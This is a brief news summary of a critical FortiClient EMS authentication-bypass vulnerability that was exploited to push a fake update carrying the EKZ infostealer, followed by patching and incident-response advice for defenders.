Overview
- A critical authentication-bypass bug in FortiClient Endpoint Management Server, tracked as CVE-2026-35616 with a CVSS score of 9.1, allows unauthenticated remote code execution through crafted API requests.
- Thursday's reporting by Arctic Wolf and multiple security outlets detailed live campaigns that abused EMS management features to deliver a fake Fortinet update that installed the EKZ infostealer on managed machines.
- The observed intrusion chain used legitimate FortiClient components: fortitray.exe launched a .cmd script that invoked a Base64-encoded PowerShell payload, which downloaded the EKZ binary and sent stolen data over HTTP to attacker infrastructure.
- Fortinet issued emergency hotfixes for FortiClient EMS 7.4.5 and 7.4.6 in April and plans a permanent fix in 7.4.7, while CISA added CVE-2026-35616 to its KEV list and ordered federal agencies to remediate.
- Defenders are urged to patch immediately, audit EMS admin activity and VPN/Remote Access Profile changes, hunt for indicators such as certificate-authentication errors and fortitray-driven script execution, and if breached revoke sessions and change affected credentials.